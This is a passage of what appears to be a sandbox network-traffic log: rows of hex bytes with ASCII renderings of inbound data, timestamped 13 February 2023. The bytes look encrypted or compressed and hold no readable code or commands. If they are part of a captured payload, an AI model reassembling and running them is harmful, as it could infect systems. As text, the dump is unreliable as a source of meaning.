                                                                                                                  Data Ascii: |inP]K_ 7}D*Ss1Z{/_V/,pr)[W.3\O2D.#fpFB?W<BW.k1!Hl&T|17X2qM@{;vzY6zJ61QR-ry>hlJL>7h3,Gas9Z6&2;sFk0|"8o
                                                                                                                  2023-02-13 17:58:09 UTC97INData Raw: 88 37 28 67 51 79 45 7e c0 18 7f 06 ad fb 14 c4 2c 3a 44 0f 62 8a b0 f0 87 0b 83 86 e4 a5 77 cb 11 a1 38 58 73 2e 7d 7f 07 fe d4 14 f8 b2 e2 d1 98 76 7d 5e d8 11 c7 1d 6b d0 b6 ad b9 8d ab e0 64 e3 a1 d1 d7 35 d6 f7 bd d3 47 de 4e a5 87 59 19 a8 d7 77 e3 02 1b 1f 2e c9 ac 84 a5 da f6 db 19 11 6b 93 9d c5 f2 ae d0 f2 b1 6e
                                                                                                                  Data Ascii: 7(gQyE~,:Dbw8Xs.}v}^kd5GNYw.kn
                                                                                                                  2023-02-13 17:58:09 UTC97INData Raw: 2a 1f 78 ab 5b 8a 9e a6 a5 4e 30 4c 00 e1 fc 91 16 13 2a 3d 97 c9 59 55 42 54 70 2b eb 7b ca 15 08 c3 3c 53 8f ee 2f 7d cc a6 98 71 fa c9 ee 24 89 02 b0 44 b1 4e 5f 1b 1a 64 96 4f 37 10 9c e8 59 de 72 74 be 13 cf 45 fa 25 39 a4 b1 4e ed cc cd 00 ef 62 71 67 6f fd a8 b4 93 4a 9d 32 23 3e 85 2c 91 b9 a6 ed fd 3d 44 37 4a 5d d6 15 86 28 fd f9 b9 8e 47 d4 0f 3b c7 9d 7b c6 2d 9e 9c 6e ff c2 9a f5 26 63 f4 7c b5 02 c0 29 7f 49 26 70 b8 f3 45 7d e3 d9 25 1b 9d 13 e9 f2 cd 5d 54 62 99 b2 24 bb 1b dc d8 c6 23 3c be fe 52 cb 52 0a 51 ae 86 60 59 e0 41 45 55 fc 35 47 fc 0e 83 65 4a d5 27 90 fd f8 f0 39 30 5f c0 7b 4e 0f 45 d1 45 54 53 50 46 3b 44 cb 51 d6 ec 13 09 50 1c 81 1c 24 e9 b5 64 35 6b a4 f6 cb 86 ab 30 51 f6 5f 34 09 1c ea 91 01 53 95 59 2c a9 d9 f2 88 fb
                                                                                                                  Data Ascii: *x[N0L*=YUBTp+{<S/}q$DN_dO7YrtE%9NbqgoJ2#>,=D7J](G;{-n&c|)I&pE}%]Tb$#<RRQ`YAEU5GeJ'90_{NEETSPF;DQP$d5k0Q_4SY,
                                                                                                                  2023-02-13 17:58:09 UTC98INData Raw: 1c cc 28 61 9e 50 f3 51 16 c7 80 f9 0c d9 cd b6 e0 f8 e7 6c 5c 5e 5b 01 ec e7 e2 c4 6e 5a 49 db d7 0c 78 6f 48 5f f3 da 72 50 ff 7f 8c cf dd b1 aa 75 65 b0 c5 e9 00 84 27 35 20 14 4f ac 94 a1 19 58 2a b8 15 15 b0 df 7e ab f6 35 75 fb b3 cc 38 b8 88 db bd 8e 6a 54 94 01 89 cf e0 ba b4 7b 01 30 e2 ab 80 11 3f 8e 96 b4 7b 4a dd 90 8e 28 e3 72 a8 39 8a 9a a6 b1 36 76 fa cd 60 05 3a 0c c4 c5 dc 4a 79 d1 3a 2f f6 40 d2 d3 51 4d 79 ad 88 93 54 ae 72 29 b6 5a 08 96 2c 2e c8 2e e2 a8 37 ee 2f 5a 75 2e 32 d8 f8 f0 f2 d1 cc cf e8 72 3f b6 29 a9 e4 94 68 b1 48 ad 1e b3 47 d5 9a ae 07 d5 b3 9d 1a 53 fe 98 b8 2a 92 b6 6a f1 26 30 21 c1 b6 70 ac 6d 96 1e ca 06 9e 96 40 6d 9b aa ba 64 2b 89 27 b0 06 e7 c9 97 3e 4c 82 74 b2 da e7 5d 82 0b 25 ea e7 70 19 04 c5 ce 56 04 9b
                                                                                                                  Data Ascii: (aPQl\^[nZIxoH_rPue'5 OX*~5u8jT{0?{J(r96v`:Jy:/@QMyTr)Z,..7/Zu.2r?)hHGS*j&0!pm@md+'>Lt]%pV
                                                                                                                  2023-02-13 17:58:09 UTC100INData Raw: 28 d5 5d f1 d8 6d a6 02 a2 a4 bd d9 17 65 43 9b 82 58 33 02 0a ab 31 c9 e9 46 3d e7 ab 28 fe 18 f9 58 ff 0a 39 38 9b 73 44 9f 6e 4d 17 59 a3 31 54 5c 4b 24 73 ab dd cf 0e 8d 6d da 28 e7 93 c8 a2 fd 5d 61 54 94 53 9b 4e b3 1e ec cc 6e 1a fa 65 d0 4a ef 44 6c 63 3f c3 73 6c a9 a9 f7 c2 3f 75 32 c5 d6 7b 42 6f f8 5f ca 99 04 99 2c 70 e2 59 fd c6 53 c5 fd dc 81 e3 83 fb 46 c6 58 45 69 d1 f9 5d b6 a5 64 87 a3 c8 dc 5f 56 9c 70 2f b3 d5 a0 ed 1e 38 9e 80 eb fe 41 57 d5 fb 50 e0 83 04 a5 a9 d6 04 cc 9f 2f 74 d6 65 eb 00 44 7c 4a 8d b4 2b e1 52 15 21 4a 2b 1e 01 90 97 32 0d 2a ad 36 0b f9 4c 39 8b 48 28 0e 7a 20 f8 6a 80 64 8b 54 ef df 0d af fe a5 75 93 5c 1d 5d f3 ad 5c 69 a7 38 f5 a5 91 fb ce 53 e0 96 4f 37 77 7c 33 1d 51 15 43 5c c2 01 66 2b 43 ab 9f 12 3b 42
                                                                                                                  Data Ascii: (]meCX31F=(X98sDnMY1T\K$sm(]aTSNneJDlc?sl?u2{Bo_,pYSFXEi]d_Vp/8AWP/teD|J+R!J+2*6L9H(z jdTu\]\i8SO7w|3QC\f+C;B
                                                                                                                  2023-02-13 17:58:09 UTC101INData Raw: 59 f4 b5 1b 88 f9 df c2 84 df 39 cd 03 13 f1 94 c7 79 a8 66 b0 dd 5f 4e ec 34 df 83 4c e7 7d cd aa b4 4a a8 fb 64 d2 e2 d6 ad 57 3b 4c ab eb d3 9e 68 05 16 ac cb 21 7e 25 c9 07 73 ee 57 24 83 09 bf e9 f2 c0 56 07 cb 9c 9f 1d f0 77 2e ca 14 c2 73 99 e6 27 a9 c4 28 0f c6 e5 4e 3e 6c 95 df 01 57 6f 99 c6 81 f7 61 2e aa a0 5f ba ca bc 31 0e 6f ce 04 ef b2 e5 bd da 05 38 d0 f8 a0 93 84 d1 8c 74 6a f2 6c 73 44 45 67 c2 e4 4d f0 d1 3a 7f 82 6e f4 be 11 23 4f 49 1f 5a 3d ad 61 4f d8 32 85 ea 54 c4 f8 33 13 7e c2 e9 30 43 30 48 d3 ff 3c 51 2c 1b 95 7a 8f d9 19 b7 0d d8 08 c1 6c a3 c0 7d c1 bf 1e c6 d6 a3 11 65 03 73 4e 44 cc 4f 58 7c 2c 5b 11 e5 2f 43 8a 2f 19 9b 4e 63 41 35 c9 87 eb 97 9c 2f 48 3f 71 73 59 22 e7 8b 41 2c 20 56 72 05 19 9c c1 7a fa e9 b5 4d 4d 46
                                                                                                                  Data Ascii: Y9yf_N4L}JdW;Lh!~%sW$Vw.s'(N>lWoa._1o8tjlsDEgM:n#OIZ=aO2T3~0C0H<Q,zl}esNDOX|,[/C/NcA5/H?qsY"A, VrzMMF
                                                                                                                  2023-02-13 17:58:09 UTC102INData Raw: 7d 4e 51 02 55 76 93 3e 33 1d 4e 37 0d a4 b5 96 0a 4a 1e 2e 50 8e 80 9e fd c0 9f ca 35 3d 91 2d ae 08 bc 53 32 0a a2 57 2b 7c 45 63 00 d1 96 cc c1 44 b4 ef 86 e7 54 bc c0 b7 a4 a9 20 2c 93 f1 f5 ad 4d c5 d4 e9 f2 c7 53 8b 0d 0e 1b 0a 15 3f 3d 02 b9 3f e9 91 3b 65 0f 8d 10 34 bc 6e e7 2a 54 c6 19 86 6b ed 1c 89 3b 28 e8 2c 48 93 64 05 51 d3 0a 2a 9c ac fb 83 73 0c 07 06 ff 16 82 63 2a d3 de 79 1d 26 c0 8e 86 cd 55 4b 77 7c 17 23 43 e2 69 f0 8d f8 60 1a ae c2 8d 19 9e b4 77 4a 8b ea c4 2d a8 36 bf 4a a7 7b 15 a3 44 ed 5d ca fe d5 1c 0c 75 2c f8 4a ac 1e ea 21 f0 8e 3a 40 4a cc 8f 92 c3 12 f9 37 52 02 0d ec 43 cd 4d 50 a4 19 7b ad ce 37 1f 12 80 1f 69 b7 54 84 b7 a1 eb bd ed 47 d1 7e e9 d0 6d c1 7a c0 3c 90 e1 51 6f d8 c0 d2 7d bd 3f b9 4f 46 c1 fa 75 fb 0a
                                                                                                                  Data Ascii: }NQUv>3N7J.P5=-S2W+|EcDT ,MS?=?;e4n*Tk;(,HdQ*sc*y&UKw|#Ci`wJ-6J{D]u,J!:@J7RCMP{7iTG~mz<Qo}?OFu
                                                                                                                  2023-02-13 17:58:09 UTC103INData Raw: c6 bc 00 a6 6f 83 c7 67 50 32 80 14 65 1a 35 63 c6 70 4c 1a b8 4a ed d6 5b ab 7a b1 07 9b fe 4b 88 77 60 62 29 88 7f 2e 6f 05 41 30 5b 51 7a 75 b4 ea 76 0f f8 42 c4 e9 15 7a ba 90 5a 38 b7 da bb 7d 2f d8 d4 4b b5 a6 77 0e 8a 0e 1a 92 27 37 e9 23 88 65 65 be 41 c0 14 07 f8 03 7e 22 0b 66 b4 66 a5 22 87 d2 36 dc c6 8c 04 8d 85 87 35 68 bd 7d d9 12 a9 5c da d5 95 b6 14 91 05 fa 29 d2 33 ff 3f 5e 79 40 36 5d a0 00 a5 88 dd 91 08 a2 45 38 75 ba 19 65 95 7d a6 f9 7d 0c 1d 9d 0c 4a 02 60 6b 7d 39 25 3e 40 90 a9 6d 20 1b fd 07 c4 03 f0 a7 34 d1 3a 58 03 0e 8a 54 d3 be 5a c8 9e a0 b4 e7 4e f7 35 b6 b0 a1 c6 65 e0 48 d2 24 43 68 54 ad 5f 9a bb 23 c5 c8 d1 71 8c 59 2a 0a 8a ca 71 17 b7 ce 3a 63 8b 53 01 8a c5 3b 0a e5 5e 96 3c c8 b2 46 b1 ad f5 15 b0 cb c5 ec 60 2b
                                                                                                                  Data Ascii: ogP2e5cpLJ[zKw`b).oA0[QzuvBzZ8}/Kw'7#eeA~"ff"65h}\)3?^y@6]E8ue}}J`k}9%>@m 4:XTZN5eH$ChT_#qY*q:cS;^<F`+
                                                                                                                  2023-02-13 17:58:09 UTC105INData Raw: 2c c5 91 9b a0 f0 c4 92 21 d3 7f e9 e4 7e 30 e1 92 23 48 d5 0c 5d bb 94 3f 00 ec bb 88 e8 3b 3a 20 7a 53 be 1c c4 d4 cc d2 be 1f 1c 9d d3 73 65 e2 6d ea 45 c2 99 36 43 8e d7 36 f4 b5 53 0f 4f 96 92 ba b9 8d ae f5 69 e3 d0 d7 f3 f7 f5 b6 11 14 aa 1d 0b 86 8b dd 65 9c 29 1a 35 94 11 9e 9f 90 6b 48 17 80 14 02 a8 80 3b a3 b9 b9 45 bb 7a 2d e5 73 49 b4 94 06 ef 95 e2 63 e4 6a 50 64 c6 4d 68 23 30 fb 97 16 01 b9 fd 6c 6a 8a e5 e0 fa fa 33 1d 4b 27 ec a0 7d 5f 71 9c a8 98 de 42 e0 a3 ff 6f 9c eb ca ed 56 7e 9d 22 99 af ce f6 f4 30 ab 86 15 be b4 76 e1 61 0e b4 04 1a 81 b6 2f 03 83 b6 2e 7a 99 a1 4e 53 09 a5 bb 68 dc ae b2 d7 33 c2 37 35 8a 52 dc 0a c6 e2 b5 97 e9 1a 0a 9f 4f aa ae 67 98 70 49 e1 c2 42 bb f5 08 ac 67 8c a2 6b c7 87 3b 62 7c 7c 02 30 d5 1c 93 34
                                                                                                                  Data Ascii: ,!~0#H]?;: zSsemE6C6SOie)5kH;Ez-sIcjPdMh#0lj3K'}_qBoV~"0va/.zNSh375ROgpIBgk;b||04
                                                                                                                  2023-02-13 17:58:09 UTC106INData Raw: 3d 42 70 40 01 8b 51 d0 00 6b 39 5e fd 27 bc 08 90 65 2a cd aa ac b9 e9 6c b5 c7 a5 2f eb bb 25 a7 75 67 62 d4 a7 1c 74 9b f3 ee 6e 88 cc 03 11 9f ad f8 60 04 39 fe 39 15 57 2c 34 d0 74 00 0b ed 7e 3e fe dc 55 9f 70 28 4f e1 b1 43 35 5e 3b d4 31 33 54 d4 ba a3 ae c7 f2 50 e1 d1 c5 49 b9 bd 31 85 65 f7 f0 fa ee 62 8a 60 52 f5 a9 2d 56 0e 94 da ee 05 91 06 c1 89 03 5f c3 e3 ae d2 ce e8 fc 5c 39 40 85 29 b3 21 aa c8 1b e8 99 c3 cb e0 17 75 12 a5 2b 12 b8 79 07 a9 4b eb c4 44 26 b9 82 56 f7 b1 98 91 cb cc aa ce 95 e6 76 e6 70 e8 3c 03 4c 9e 7e 47 49 cf 5a a2 86 7b 4d 87 7d b3 90 78 7b 88 0c 3c ab 69 40 dd 89 bf 6c f3 7d 41 d5 3f f6 e6 99 6f e3 de d9 19 c2 fd 48 aa 5a c0 13 d1 90 8e 9e 22 0f ab 09 f5 32 ad b3 a9 e2 e5 48 31 49 1c 53 a3 74 87 58 ce 37 81 b2 4a
                                                                                                                  Data Ascii: =Bp@Qk9^'e*l/%ugbtn`99W,4t~>Up(OC5^;13TPI1eb`R-V_\9@)!u+yKD&Vvp<L~GIZ{M}x{<i@l}A?oHZ"2H1IStX7J
                                                                                                                  2023-02-13 17:58:09 UTC107INData Raw: e9 af ba 57 dc f5 89 60 d4 6f 21 99 69 ab d7 97 66 0c 66 39 3c 60 18 23 80 d3 ec dd 09 c2 60 ad b5 26 38 00 a0 09 42 19 4f 0d c1 f9 0d 18 7c aa 62 41 a6 62 b1 96 b7 90 86 dd 4b 6d 35 c1 68 1d 5a 32 b3 90 ca 9b f4 3c 7c 18 5b 39 53 a5 33 6d 4e 42 62 bb 54 39 69 ec a0 37 a9 88 05 81 a8 e5 ad c3 08 99 d9 29 0b cb 9a f6 c0 ce c2 f0 10 16 75 a0 86 44 52 35 94 19 af 99 fc 63 00 48 ff 97 85 19 3e 79 06 d1 89 5e 26 9f 83 2e 9c 96 12 ea 2b f7 30 3b 8f be 66 2a ca 43 80 cb 17 d3 2a ec 74 d2 a1 24 c4 87 a3 21 ec f7 30 c9 36 3b 1f 88 16 db d1 cb 8e 55 7f 6a db 7d f2 e3 7e a5 09 00 1e 9f d5 27 f4 6c 61 c7 09 17 9b 43 dd e6 9c fe a0 66 27 e8 66 ca be 3b 99 37 c5 73 b7 1a 90 ba ab 76 5f a0 47 7d 04 4a 89 37 ca 38 42 1e 30 21 6d 17 0a 3c c7 e9 a2 b4 92 26 74 0d 1d 4a fa
                                                                                                                  Data Ascii: W`o!iff9<`#`&8BO|bAbKm5hZ2<|[9S3mNBbT9i7)uDR5cH>y^&.+0;f*C*t$!06;Uj}~'laCf'f;7sv_G}J78B0!m<&tJ
                                                                                                                  2023-02-13 17:58:09 UTC108INData Raw: 95 b4 de f6 23 50 7a 31 c7 91 15 45 c4 eb 2d 8b b2 5e 87 f4 ed 36 a2 95 c5 f3 7e 87 c7 5e 2f cd fd 08 d5 a0 f8 f9 a0 6c 0d ab d1 c5 c5 90 89 13 20 49 ad ac f2 b8 58 0d 88 67 a6 96 b3 8f 16 f8 4c 2e d2 20 60 e4 a5 62 17 5e dd bf 5c 95 98 03 cd 21 28 13 52 cd 68 92 7a 9e 2f 02 5c c0 4b 1a f2 12 61 bf 1f e0 ab 82 67 15 ae c2 bc d6 d5 10 31 d6 1f f9 a8 ba 98 0b c5 66 59 5b c8 23 a0 af 1a 09 c6 8f 6b cf 3a c9 a5 56 20 b9 2f d4 b4 b0 30 ef 50 2b 0e e9 c6 2a 7f 1b bc c4 63 3e 4c bd ae 98 34 86 4c 3f 2b 1f 2e 33 b2 1a e3 92 ae 1d 60 41 34 0d 21 2d 6d a6 59 5b ec a0 7a f8 0d 3f d2 28 f6 79 63 32 42 d6 67 62 a7 c5 6a dd 7f b0 b9 9f c4 50 6e 0c 2e 1f 61 1e d3 ec 2d 22 65 75 4e b1 fa 16 d7 09 64 e5 c1 2f 4a 63 f8 fb 96 14 7f 27 96 9d c5 a8 2b 71 f4 bc d8 d2 ab 81 e0
                                                                                                                  Data Ascii: #Pz1E-^6~^/l IXgL. `b^\!(Rhz/\Kag1fY[#k:V /0P+*c>L4L?+.3`A4!-mY[z?(yc2BgbjPn.a-"euNd/Jc'+q
                                                                                                                  2023-02-13 17:58:09 UTC109INData Raw: fd 10 f1 b3 83 06 49 f5 0b 7f 74 be ef 77 00 fb fa 10 25 1a 16 c0 85 fe 4b 0a c2 c5 f1 e4 14 0a ad 19 ea a8 17 38 86 6b 36 ab 11 f8 f8 0f fd d7 9d c3 21 1d 93 57 74 3d 1a ed 7e 0d 61 ea c9 1d e5 de fa 28 bc 4f 65 43 86 58 6e d1 8f a1 97 8f c0 2b 5a a6 92 59 9e 50 dd 91 4b 9b 1d 18 bf 6c 21 7e 2c b0 c3 51 6d 50 32 00 b0 eb 49 8b 84 b5 e5 38 0c 90 8d 74 26 ac 31 34 55 2f ab 17 7b 71 05 29 a2 e3 23 fe d7 0b e7 63 7e d5 49 fc ae bd aa aa 43 63 fc 3a 67 5e c1 04 27 bf c2 41 fa da 5f af df cb b5 08 9d 16 62 48 03 1e 43 94 f6 53 3a b5 af 14 a1 d9 1e e1 c9 ba e1 88 29 19 10 10 fa ce 62 0c dc be 40 ec 05 00 0d 79 0c 8c 64 e3 ad e3 d7 e0 a9 5b e8 3e 96 b8 2e b2 48 d7 54 40 5f 17 7f d0 9b 15 37 4c 27 89 d1 18 2a 55 fc 64 79 53 40 5d 27 da a5 73 6d 21 dc 2e 37 43 ab
                                                                                                                  Data Ascii: Itw%K8k6!Wt=~a(OeCXn+ZYPKl!~,QmP2I8t&14U/{q)#c~ICc:g^'A_bHCS:)b@yd[>.HT@_7L'*UdyS@]'sm!.7C
                                                                                                                  2023-02-13 17:58:09 UTC111INData Raw: 82 22 82 33 30 43 fd 48 7a 6b 00 3c 55 a5 57 6d ca 6c 38 1a c7 69 e3 10 cb 6b e6 3b 4b 64 4d 1d 96 1c 3f 07 71 0d aa 9a 42 4d 3e 6a 86 60 83 9f 52 e1 6b 54 05 38 0d 74 d4 1f e8 62 0e 73 fd 8a 23 8d 70 bc 33 94 f5 03 11 07 3a 80 97 e7 9c da ef 1c 7d 1b c3 b3 f5 87 bc 64 84 ab ea da 54 f5 36 5f 67 2b 7c cb 8a 1b ea 84 10 e6 44 ab f3 c5 3c 01 44 1b af 2f 3f 71 7b 28 ad 29 aa 84 6b f5 7e bf c0 8e 87 89 82 de b4 a3 1b 87 24 2b f9 c6 61 ea a5 a8 3e 5d e6 5a 81 89 27 78 bf ba 8a 1c d9 67 40 3b 6f ef 1d 6d 1b 36 cd fa a0 9a c9 b3 5b af 92 bb 3f a4 56 b2 ed 7e 97 9c 2a 65 21 39 1e d7 a5 3b 3e d2 26 7d 6f 48 ba 79 55 23 48 43 26 8a c9 f2 51 04 c2 ee 8e 84 b6 e1 b6 38 0e 64 13 09 f3 0a dd c8 be 2c a7 7c 86 f6 03 3d 86 b7 4c ee 0d 8a fe 36 68 18 56 6a e8 e4 53 dc 5f
                                                                                                                  Data Ascii: "30CHzk<UWml8ik;KdM?qBM>j`RkT8tbs#p3:}dT6_g+|D<D/?q{()k~$+a>]Z'xg@;om6[?V~*e!9;>&}oHyU#HC&Q8d,|=L6hVjS_
                                                                                                                  2023-02-13 17:58:09 UTC112INData Raw: 53 5c 2e 29 f4 0d ba 5b 98 34 bd 98 ef a3 de b7 27 63 30 24 44 b0 ea 21 48 97 d5 b4 ff 64 9e 0a 43 96 57 f5 fa a6 cf c5 16 93 1d a2 a4 9b 34 1d 1c a4 6e d7 cc 7e 5d 8a 4d 97 c5 1c 05 71 65 8b bf 80 d2 34 98 c7 39 d2 96 44 b0 a6 ac 3c d3 12 87 72 53 0b cf ef 26 e8 9c 6b a0 be ca 26 6d 59 e7 5b 89 e4 da e4 e4 46 dd 7d 1a 12 9c 39 9c d1 50 8e e5 9e 4c f7 c3 c2 b2 f4 a3 99 51 1f 2f 66 a1 51 59 f3 d3 4c b6 d2 70 de 1f 9b c9 de c0 77 49 e1 83 b5 8f 8c 75 a3 2b a4 6a 1e b5 8f 1f f1 97 63 2b cd bd 7d a9 a7 96 50 6b 1a 4d 12 a2 e8 47 a3 f9 18 6a 02 76 2d 7b b6 e4 b5 2f fb e4 6b 97 0c 7f 9d 7b 7a f8 08 d6 03 59 f0 79 76 5d 17 42 0d 9c e2 5f 42 bc d8 a4 56 36 9a b2 ad c8 8b 63 a1 70 a7 17 b5 e9 1c 59 b1 d2 b0 19 f6 86 48 25 85 cf ce 32 69 f7 3f f5 72 81 6d 27 f2 a7
                                                                                                                  Data Ascii: S\.)[4'c0$D!HdCW4n~]Mqe49D<rS&k&mY[F}9PLQ/fQYLpwIu+jc+}PkMGjv-{/k{zYyv]B_BV6cpYH%2i?rm'
                                                                                                                  2023-02-13 17:58:09 UTC113INData Raw: 47 68 ef 5a c9 c6 b0 1f 1e 32 9c 73 59 0a c8 6d 61 58 d0 63 a5 c3 ac 38 14 99 72 cd 93 26 f7 78 2a df 91 9b 87 7f 0d 52 85 c1 5b 48 73 b3 f1 98 9d f0 f7 af c1 60 8b 52 1c 14 85 c1 9b c8 ba 51 ef 39 2f 71 8e 82 2a ee a6 88 75 bc 1e c2 cf da d3 ca 9e 6d 4d 8f ae d9 0c 2e 02 44 89 1d a7 2e 13 61 c4 8f 53 7c 9e 94 7d 28 34 d8
                                                                                                                  Data Ascii: GhZ2sYmaXc8r&x*R[Hs`RQ9/q*umM.D.aS|}(4
                                                                                                                  2023-02-13 17:58:09 UTC113INData Raw: 7f 34 66 63 3d c2 b7 b1 01 9e 8e 22 eb 0d ac b7 ae f7 71 c7 88 8d b5 7b f5 01 24 f6 a8 d8 c7 12 2e d6 62 7f 95 c6 71 ae d6 bf f8 bf 7f 84 89 fa 36 f7 03 9f 3c ca de 13 46 ed e8 fd 15 ce 53 d3 1b f3 94 79 65 5f 86 cb cf 27 3d 9a fe b3 0a 0e c8 ad b3 11 3f 42 c4 58 57 66 f5 51 cc 0c 7d f4 31 2e 0f 12 8d 7f 32 f8 72 a1 38 d0 12 3b 86 f1 f9 75 90 e5 9c a3 a8 95 12 9e 1c f7 a6 ba 2e cc 3d 79 7d e4 0d 3e 12 2e 96 a1 c7 ee a0 ae 09 f2 6b ce 74 c3 95 7c 91 fc 23 f0 9d 67 5f c0 4f 8e b9 39 6f dc 77 a9 ce de cb a5 aa 51 d9 7b 5d fc ed f2 62 ee 6a ba 2e 8c fa 53 99 76 2f eb 8f 5a 68 a4 02 3f 84 d2 ab 7f 22 ef 68 27 e5 a6 6c a4 0d 34 56 f6 a5 a5 bb 51 54 85 0f 02 b2 93 71 df fd 1b 26 bc 58 73 b5 80 5c 14 35 3b 2f 1b d9 61 68 a8 b0 d4 1a c4 a7 72 a1 77 cc 7e b8 8c d9
                                                                                                                  Data Ascii: 4fc="q{$.bq6<FSye_'=?BXWfQ}1.2r8;u.=y}>.kt|#g_O9owQ{]bj.Sv/Zh?"h'l4VQTq&Xs\5;/ahrw~
                                                                                                                  2023-02-13 17:58:09 UTC114INData Raw: 2a 6a 45 f1 73 18 c8 09 cc 85 20 b5 1b 31 21 b2 3a f5 da 7d f7 a6 27 34 7a f4 87 80 74 78 48 b6 5c 29 92 6f 7c 36 57 4d 95 38 82 6b 47 61 45 b4 ab e1 91 50 c2 67 f5 d6 bb 30 87 e8 a6 ec 0b 2d 92 4d ec a7 43 f8 69 d5 34 74 42 6d 53 3a b2 77 0a cb 95 dc 9d 7e b0 84 0e 5d 63 41 37 24 56 be 99 9b 09 b1 7a 3c a8 35 06 68 6c 50 61 89 06 80 1e 77 15 39 51 bc 52 8f d1 f8 5b 92 eb de 05 8e 18 50 6d b3 da 04 e2 67 b9 41 ff 41 29 6a a3 59 09 d6 57 54 30 ab 84 6b 85 4d 2a fa 97 2b c5 04 61 ab 06 50 2d 66 a3 34 73 c3 e7 b0 db 0b 46 09 36 19 93 49 2e 0f e3 e2 1b 19 95 5f 5f 7d 46 2e 00 b5 b0 69 f4 e3 47 e0 de 65 82 e4 41 73 1c 6a 74 7e 31 ff f8 b9 34 ba 75 1b b6 ae fc 59 2d 4c ff 5d f8 3b 4d df 3c 09 ee 54 e9 c0 d7 d1 62 ea be 96 50 3a 0e e4 4f 42 66 39 ea dc 2c bf b0
                                                                                                                  Data Ascii: *jEs 1!:}'4ztxH\)o|6WM8kGaEPg0-MCi4tBmS:w~]cA7$Vz<5hlPaw9QR[PmgAA)jYWT0kM*+aP-f4sF6I.__}F.iGeAsjt~14uY-L];M<TbP:OBf9,
                                                                                                                  2023-02-13 17:58:09 UTC116INData Raw: bf 9a a7 61 4e 26 61 74 e4 14 7d b5 81 9b 80 52 eb 3e 73 ca 53 b9 04 d6 aa 0d ff 40 99 f9 29 eb 9c 09 1a 7b 01 d0 b0 26 97 2d bb 09 21 7e 62 91 48 56 45 29 72 82 6f 73 c8 b8 e7 0c b2 69 f0 fa dc 60 92 90 d0 4c 16 97 d1 b5 21 f0 41 2d 93 60 d9 92 35 7a e5 23 80 d1 3f fb e5 08 41 ed 1c d1 7f e7 e7 10 6d 0e 7c ed 70 59 d1 08 e2 b6 93 47 a2 8c c8 e9 56 9a 77 e2 d3 5c ba 8e 7e 72 e1 c8 53 38 6d 20 03 28 b1 b6 e9 33 99 8c 10 18 01 55 96 ab 7f 3e 18 b3 82 54 7b 2c e4 f7 d9 be 43 72 87 2c cf 6d ad 26 5a 3c 3c b1 2f 8c 26 2a 92 c0 73 fa 22 67 bb 35 61 8a 0e 32 0e a4 59 90 81 e1 27 ed 03 2d 56 37 0c c9 87 9f 99 d7 fb 17 2f 18 12 2e 00 7c 86 72 25 e6 68 17 06 3f f2 a5 f3 a7 64 16 f9 4a 2b 54 18 be 8c ac b1 23 e5 2f 16 1d 15 16 11 e4 2d 75 74 4d 7a fc a9 ff b1 ea bd
                                                                                                                  Data Ascii: aN&at}R>sS@){&-!~bHVE)rosi`L!A-`5z#?Am|pYGVw\~rS8m (3U>T{,Cr,m&Z<</&*s"g5a2Y'-V7/.|r%h?dJ+T#/-utMz
                                                                                                                  2023-02-13 17:58:09 UTC117INData Raw: 88 b5 86 ee ac 97 e4 ce f6 e0 8f ec 50 25 9a 3b 7d d6 54 e0 c4 14 c8 fa c1 24 67 88 c3 03 28 f7 3a 30 fb 84 e6 be 8c 84 37 cb 0b 5a da 24 2b 2d 84 b2 6b 94 19 97 6e 14 1a 0d bb 12 56 f3 10 ee ce eb 5e 46 51 d6 da 2e 28 f6 00 d3 49 ce f4 cd d3 fc 42 5a c8 c1 6c 24 76 24 41 26 31 bf 47 1e a1 8a bf e3 93 b3 bd a2 8c 91 12 03 11 58 49 8e 30 2e 86 c4 a5 e8 81 e6 82 de 10 75 45 19 05 55 c5 3b 15 3c aa 77 10 61 52 96 5d 76 38 9f e1 16 68 4f 58 90 bb 4b 4b 20 42 a2 6e 71 8b d2 0c 41 c5 8c 00 6e 8f 3b 29 97 4e 84 bd 0f d9 7b 5d 68 f6 97 2b b9 1a a6 72 f7 74 38 9f 62 c2 c9 24 2a e5 ba 72 cf 9f aa c0 dd 4c 22 47 8a 0f 11 57 76 a3 82 94 ae 51 d7 f8 35 8a f3 00 b1 0e 20 01 cb 63 05 27 7a 16 24 a7 b2 99 00 13 69 c5 28 62 37 4c 34 6e 4b f3 82 34 dc 06 a1 ed b2 17 75 f8
                                                                                                                  Data Ascii: P%;}T$g(:07Z$+-knV^FQ.(IBZl$v$A&1GXI0.uEU;<waR]v8hOXKK BnqAn;)N{]h+rt8b$*rL"GWvQ5 c'z$i(b7L4nK4u
                                                                                                                  2023-02-13 17:58:09 UTC118INData Raw: 44 16 3b 34 f8 ca ad 31 cb b9 73 92 a7 ff 9f 3a a9 c6 56 4a 11 c9 49 43 fc 57 a5 b7 d8 8c f7 aa 16 e5 61 9e 06 3a 4b 7a 3a b3 ac d0 34 97 fe cd d5 21 96 37 21 21 52 62 36 88 85 25 56 09 08 51 43 36 12 f4 e7 53 5f 44 fb ec e3 77 32 d5 d4 28 ef a0 5a 5a 40 b5 6d 82 71 ce 5e 52 27 11 46 91 1a 58 d6 96 7c 36 34 5a a4 0c 08 76 ca c0 74 c8 17 2f 98 d0 bf 61 66 28 60 62 71 47 67 41 53 f4 89 32 b9 28 30 63 c0 3b 26 2c 95 ff 53 61 e7 79 07 ec 81 72 98 d7 8c c9 1a 35 13 09 51 f7 19 89 d4 d1 25 2b 5a 09 cf eb 11 64 91 fc b3 6b 30 aa 4b 9e 2f f4 70 6a b6 9a f8 66 94 d1 00 68 f0 0b 24 19 45 64 01 de 6f 0a 3d e6 db 41 d3 f3 65 83 97 e0 2c dc 5e 40 16 34 36 da 56 b3 b0 2e c1 d2 d4 34 83 2c b8 9e 22 ec 92 d1 da 74 9e a3 c2 a8 05 79 ff 86 7d d4 90 3b cd ea 77 a0 ba 13 93
                                                                                                                  Data Ascii: D;41s:VJICWa:Kz:4!7!!Rb6%VQC6S_Dw2(ZZ@mq^R'FX|64Zvt/af(`bqGgAS2(0c;&,Sayr5Q%+Zdk0K/pjfh$Edo=Ae,^@46V.4,"ty};w
